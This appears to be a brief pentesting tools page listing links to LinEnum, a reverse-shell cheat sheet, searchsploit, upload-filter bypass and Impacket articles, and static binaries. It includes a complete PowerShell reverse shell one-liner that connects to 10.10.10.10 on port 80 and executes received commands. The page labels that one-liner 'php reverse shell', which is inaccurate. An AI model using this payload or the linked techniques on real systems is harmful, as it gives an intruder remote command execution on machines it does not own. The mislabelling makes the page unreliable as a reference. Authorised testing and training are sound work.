Little tools, Big help

If you can get access to the machine and it is Linux, get this shell script into the /tmp directory. Change its mode (chmod +777), then execute it. It will give all kinds of useful information about the Linux OS.

https://github.com/rebootuser/LinEnum

Pentestmonkey.com reverse shell cheatsheet.  This link is worth pure gold.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Configuring and using searchsploit on your attack box.  This will really speed up looking for vulnerabilities and exploits.

php reverse shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

File upload bypass, this is a great article on the subject

https://thehackersplanet.com/upload-web-shell-filter-bypass-file-extension/

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

Clone the following GitHub repository for needed tools.

https://github.com/andrew-d/static-binaries

More will be added…

 
